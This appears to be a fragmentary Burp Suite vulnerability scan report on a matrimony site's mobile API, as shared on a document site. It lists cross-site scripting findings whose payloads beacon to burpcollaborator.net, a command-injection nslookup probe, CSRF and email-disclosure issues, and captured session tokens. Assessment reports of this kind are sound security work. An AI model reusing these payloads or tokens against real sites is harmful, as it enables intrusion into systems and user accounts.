1646&LISTTYPE=1&NOOFREC=20&OUTPUTTYPE=2&PROFILEHIGHLIGHTS=2&READTYPE=23~24&START=0&TABTYPE=16&
...[SNIP]...
Response
Server: Apache
Content-Length: 233
Date: Tue, 19 May 2020 17:35:46 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appunified/appinboxui.phpenkvry4ekx was not found on this server.</p>
...[SNIP]...
5.38. https://apps.bharatmatrimony.com/appunified/appinboxui.php [name of
Previous Next
Summary
Confidence: Certain
Path: /appunified/appinboxui.php
Issue detail
Request
GET /appunified/appinboxui.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2fxdeazhjp71csv0wu8qw2lm7s3j9baz2pqjda1z%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Accept-Language: en
Connection: close
Response
Server: Apache
Content-Length: 336
Date: Tue, 19 May 2020 17:12:58 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
/appunified/appinboxui.php/'"><svg/onload=(new(Image)).src='//xdeazhjp71csv0wu8qw2lm7s3j9baz2pqjda1z\56burpcol
...[SNIP]...
5.39. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [URL
path filename]
Previous Next
Summary
Confidence: Certain
Path: /appunified/viewcalldetails.php
Issue detail
Request
POST /appunified/viewcalldetails.phpyj5dbps38m HTTP/1.1
Accept: */*
Connection: close
Content-Length: 199
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&ID=M6651646&LOGINGE
N=M&NOOFREC=20&OUTPUTTYPE=2&REQTYPE=1&START=0&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
Server: Apache
Content-Length: 238
Date: Tue, 19 May 2020 17:16:35 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appunified/viewcalldetails.phpyj5dbps38m was not found on this server.</p>
...[SNIP]...
5.40. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [name
of an arbitrarily supplied URL parameter]
Previous Next
Summary
Confidence: Certain
Path: /appunified/viewcalldetails.php
Issue detail
Request
GET /appunified/viewcalldetails.php/javascript%3a%2f*%3c%2fscript%3e%3csvg%2fonload%3d'%2b%2f%22%2f%2b
%2fonmouseover%3d1%2f%2b%2f[*%2f[]%2f%2b((new(Image)).src%3d([]%2b%2f%5c
%2fknbx94tchomf5n6hid6pv9hfd6jylmdd17oycn%5c.burpcollaborator.net%2f).replace(%2f%5c%5c%2fg%2c[]))%2f%2f'%3e HTTP/1.1
Accept: */*
Accept-Language: en
Connection: close
Response
Server: Apache
Content-Length: 420
Date: Tue, 19 May 2020 17:13:44 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /appunified/viewcalldetails.php/javascript:/*</script><svg/onload='+/"/+/onmouseover=1/+/
[*/[]/+((new(Image)).src=([]+/\/knbx94tchomf5n6hid6pv9hfd6jylmdd17oycn\.burpcollaborator.net/).replace(/\\/g,[]))//'> was not
found on this server.</p>
...[SNIP]...
6. Email addresses disclosed

Previous Next
· /applogin/loginwithdet.php
· /appmemberhome/memstats.php
Issue background
The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email
addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary
third-party email addresses within their core content.
However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source)
may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the
application's login, and they may be used in social engineering attacks against the organization's personnel. Unnecessary or
excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.
Issue remediation
Consider removing any email addresses that are unnecessary, or replacing personal addresses with anonymous mailbox
addresses (such as helpdesk@example.com).
To reduce the quantity of spam sent to anonymous mailbox addresses, consider hiding the email address and instead
providing a form that generates the email server-side, protected by a CAPTCHA if necessary.
· CWE-200: Information Exposure
Previous Next
Summary
Confidence: Certain
Issue detail
The following email address was disclosed in the response:
· bmtesting34@gmail.com
Request
Accept: */*
Connection: close
Content-Length: 611
%22ISO_COUNT
...[SNIP]...
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Date: Tue, 19 May 2020 12:24:06 GMT
Connection: close
...[SNIP]...
0"},"GENDER":"M","PROFILECREATEDFOR":"1","MOTHERTONGUE":"47","GOTHRAID":"0","CASTE":"1017","POWERPACKSTATUS":"2",
"MEMBERTYPE":"F","SENTACCESS":"N","MEMBERSHIPNAME":"","MEMBERSTATUS":"0","MEMBEREMAIL":"bmtesting34@gmail.com
","DAYSOFREGISTRATION":"232","VALIDDAYS":"0","EXPIRYDATE":"2020-05-08
12:22:59","NUMBEROFPAYMENTS":"2","AUTORENEWALSTATUS":"0","POSTFLAG":"0","PROFILECOMPVAL":"79","ENABLEDISCOVER":
"1","DSSIMAGE":"","D
...[SNIP]...
Previous
Summary
Confidence: Certain
Issue detail
The following email address was disclosed in the response:
· bmtesting34@gmail.com
Request
POST /appmemberhome/memstats.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 170
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Date: Tue, 19 May 2020 15:43:14 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0","GENDER":"M","MEMBERTYPE":"F","SENTACCESS":"N","MEMBERSHIPNAME":"","MEMBERST
ATUS":"0","MEMBEREMAIL":"bmtesting34@gmail.com","DAYSOFREGISTRATION":"232","VALIDDAYS":"0","EXPIRYDATE":"2020-05-08
12:22:59","NUMBEROFPAYMENTS":"2","AUTORENEWALSTATUS":"0","POSTFLAG":"0","PROFILECOMPVAL":"79","ENABLEDISCOVER":
"1","DSSIMAGE":"","D
...[SNIP]...
7. SSL certificate
Previous
Summary
Confidence: Certain
Path: /
Issue detail
The server presented a valid, trusted SSL certificate. This issue is purely informational.
The server presented the following certificates:
Server certificate
w1.matrimony.com, *.assamesematrimony.com, *.assistedmatrimony.com, *.bengalimatrimony.com,
*.bharatmatrimony.com, *.elitematrimony.com, *.gujaratimatrimony.com, *.hindimatrimony.com,
*.kannadamatrimony.com, *.keralamatrimony.com, *.marathimatrimony.com, *.marwadimatrimony.com,
*.matrimony.com, *.matrimonycdn.com, *.matrimonycorp.com, *.oriyamatrimony.com, *.parsimatrimony.com,
*.punjabimatrimony.com, *.sindhimatrimony.com, *.tamilmatrimony.com, *.telugumatrimony.com,
Issued to:
*.urdumatrimony.com, assamesematrimony.com, assistedmatrimony.com, bengalimatrimony.com,
bharatmatrimony.com, elitematrimony.com, gujaratimatrimony.com, hindimatrimony.com, kannadamatrimony.com,
keralamatrimony.com, marathimatrimony.com, marwadimatrimony.com, matrimony.com, matrimonycdn.com,
matrimonycorp.com, oriyamatrimony.com, parsimatrimony.com, punjabimatrimony.com, sindhimatrimony.com,
tamilmatrimony.com, telugumatrimony.com, urdumatrimony.com
Issued by: GlobalSign RSA OV SSL CA 2018
Valid from: Thu Nov 21 15:47:02 IST 2019
Valid to: Sun Feb 06 13:06:04 IST 2022
Certificate chain #1
Issued to: GlobalSign RSA OV SSL CA 2018
Issued by: GlobalSign
Valid from: Wed Nov 21 05:30:00 IST 2018
Valid to: Tue Nov 21 05:30:00 IST 2028
Certificate chain #2
Issued to: GlobalSign
Issued by: GlobalSign
Valid from: Wed Mar 18 15:30:00 IST 2009
Valid to: Sun Mar 18 15:30:00 IST 2029
Issue background
SSL (or TLS) helps to protect the confidentiality and integrity of information in transit between the browser and server, and
to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate that is
valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these
requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.
It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections in
particular. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without
user detection even when a valid SSL certificate is used.
References
· SSL/TLS Configuration Guide
· CWE-295: Improper Certificate Validation
· CWE-326: Inadequate Encryption Strength
· CWE-327: Use of a Broken or Risky Cryptographic Algorithm
Report generated by Burp Suite web vulnerability scanner v1.7.35, at Tue May 19 23:30:27 IST 2020.

BM Scan Report

Uploaded by

Document Information

Original Description:

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

BM Scan Report

Uploaded by

Copyright:

Available Formats

Burp Scanner Report

The payload &nslookup -q=cname 7ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net .&'\"`0&nslookup

Collaborator DNS interaction

2. Cross-site request forgery

There are 5 instances of this issue:

There are 6 instances of this issue:

4. Strict transport security not enforced

There are 40 instances of this issue:

· /apicommhistory/communicationhistory.php [URL path filename]

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

5.5. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [URL path

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

5.15. https://apps.bharatmatrimony.com/appei/appspromos.php [URL path

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

5.19. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [URL path

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

5.21. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [URL path

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

5.23. https://apps.bharatmatrimony.com/applogin/logout.php [URL path

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

5.27. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [URL path

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

5.31. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [URL path

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

5.37. https://apps.bharatmatrimony.com/appunified/appinboxui.php [URL path

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

6. Email addresses disclosed

There are 2 instances of this issue:

The server presented the following certificates:

You might also like